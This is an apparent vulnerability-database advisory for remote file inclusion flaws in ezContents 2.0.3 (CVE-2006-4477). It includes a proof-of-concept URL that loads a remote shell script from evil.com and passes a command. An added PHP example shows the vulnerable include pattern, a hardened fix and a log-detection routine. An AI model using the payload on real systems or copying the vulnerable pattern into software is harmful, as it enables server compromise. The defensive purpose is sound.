Visualshapers EzContents: multiple remote file inclusion vulnerabilities via the GLOBALS[rootdp] parameter

Vulnerability ID: 1110920    Vulnerability type: Input validation
Published: 2006-08-30    Updated: 2006-09-15
CVE ID: CVE-2006-4477    CNNVD ID: CNNVD-200608-497
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/28462
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-497
|Vulnerability details
VisualShapers ezContents 2.0.3 contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code by supplying an empty GLOBALS[rootdp] parameter together with an ftps URL in the following parameters: (1) the GLOBALS[admin_home] parameter of the (a) diary/event_list.php, (b) gallery/gallery_summary.php, (c) guestbook/showguestbook.php, (d) links/showlinks.php and (e) reviews/review_summary.php scripts; and (2) the GLOBALS[language_home] parameter of the (f) calendar/calendar.php, (g) news/shownews.php, (h) poll/showpoll.php, (i) search/search.php, (j) toprated/toprated.php and (k) whatsnew/whatsnew.php scripts.
|Exploit
source: http://www.securityfocus.com/bid/19776/info

ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
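The following PHP is an added illustration and is not ezContents' own code. It reduces the flaw described above to its core (an include path assembled from `$GLOBALS` entries that a request can populate when `register_globals` is on), places a hardened version of the same logic beside it, and adds a small access-log check a defender can run. The names `rootdp`, `language_home` and the `languages/` directory layout are assumptions modelled on the advisory's parameter names, and the log lines are constructed samples.

```php
<?php
// Added illustration, not ezContents' own code. The parameter names rootdp and
// language_home come from the advisory; the 'languages/' layout is an assumption.
//
// Server-side hardening that removes the whole class of issue, regardless of
// application code (php.ini):
//   register_globals = Off     ; requests can no longer populate $GLOBALS
//   allow_url_include = Off    ; include()/require() refuse URL wrappers

// Vulnerable pattern: an empty rootdp and a URL in language_home turn the path
// into "ftps://.../lang_en.php", which include() fetches over the network when
// URL wrappers are enabled. Kept as-is to show the shape of the defect.
function vulnerable_language_path(array $globals): string
{
    $rootdp        = $globals['rootdp'] ?? '';
    $language_home = $globals['language_home'] ?? 'languages/';
    return $rootdp . $language_home . 'lang_en.php';
}

// Hardened pattern: never take the base directory from the request, map the
// user's choice through an allowlist, and verify the resolved path stays inside
// the fixed directory even if the allowlist is later edited carelessly.
function safe_language_path(string $requested): string
{
    $allowed = ['en', 'de', 'fr'];                  // known language codes only
    if (!in_array($requested, $allowed, true)) {
        $requested = 'en';                          // fall back rather than fail open
    }
    $base = realpath(__DIR__ . '/languages');       // server-controlled base dir
    if ($base === false) {
        throw new RuntimeException('languages directory missing');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . 'lang_' . $requested . '.php');
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file outside allowed directory');
    }
    return $path;
}

// Detection aid for web server access logs: flag requests that inject
// GLOBALS[...] keys or carry a URL scheme inside a query-string value.
// Returns the offending log lines unchanged so they can be forwarded as-is.
function find_rfi_attempts(array $log_lines): array
{
    $hits = [];
    foreach ($log_lines as $line) {
        if (!preg_match('/"(?:GET|POST) (\S+)/', $line, $m)) {
            continue;                               // no request line, skip
        }
        $pos = strpos($m[1], '?');
        if ($pos === false) {
            continue;                               // no query string at all
        }
        $query = urldecode(substr($m[1], $pos + 1));
        if (preg_match('/GLOBALS\[/i', $query)
            || preg_match('/=[a-z][a-z0-9+.\-]*:\/\//i', $query)) {
            $hits[] = $line;
        }
    }
    return $hits;
}

// Constructed sample log lines (not real traffic; addresses are documentation ranges).
$sample = [
    '203.0.113.5 - - [30/Aug/2006:10:00:00 +0000] "GET /modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://198.51.100.7/x.php HTTP/1.0" 200 512',
    '203.0.113.9 - - [30/Aug/2006:10:00:01 +0000] "GET /modules/toprated/toprated.php?page=2 HTTP/1.0" 200 2048',
];
print_r(find_rfi_attempts($sample));
```

Run with `php example.php`: the first sample line is reported (it contains both a `GLOBALS[` key and a `ftps://` value) and the second is not. The hardened path function deliberately falls back to a default language rather than trusting any part of the request for the directory, which is the property the vulnerable pattern lacks.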
|References

Source: XF
Name: ezcontents-multiple-scripts-file-include(28674)
Link: http://xforce.iss.net/xforce/xfdb/28674
Source: BID
Name: 19776
Link: http://www.securityfocus.com/bid/19776
Source: BUGTRAQ
Name: 20060830 ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS
Link: http://www.securityfocus.com/archive/1/archive/1/444779/100/0/threaded
Source: OSVDB
Name: 28331
Link: http://www.osvdb.org/28331
Source: OSVDB
Name: 28330
Link: http://www.osvdb.org/28330
Source: OSVDB
Name: 28329
Link: http://www.osvdb.org/28329
Source: OSVDB
Name: 28328
Link: http://www.osvdb.org/28328
Source: OSVDB
Name: 28327
Link: http://www.osvdb.org/28327
Source: OSVDB
Name: 28326
Link: http://www.osvdb.org/28326
Source: OSVDB
Name: 28325
Link: http://www.osvdb.org/28325
Source: OSVDB
Name: 28324
Link: http://www.osvdb.org/28324
Source: OSVDB
Name: 28323
Link: http://www.osvdb.org/28323
Source: OSVDB
Name: 28322
Link: http://www.osvdb.org/28322
Source: OSVDB
Name: 28321
Link: http://www.osvdb.org/28321
Source: VUPEN
Name: ADV-2006-3420
Link: http://www.frsirt.com/english/advisories/2006/3420
Source: SECTRACK
Name: 1016770
Link: http://securitytracker.com/id?1016770
Source: SECUN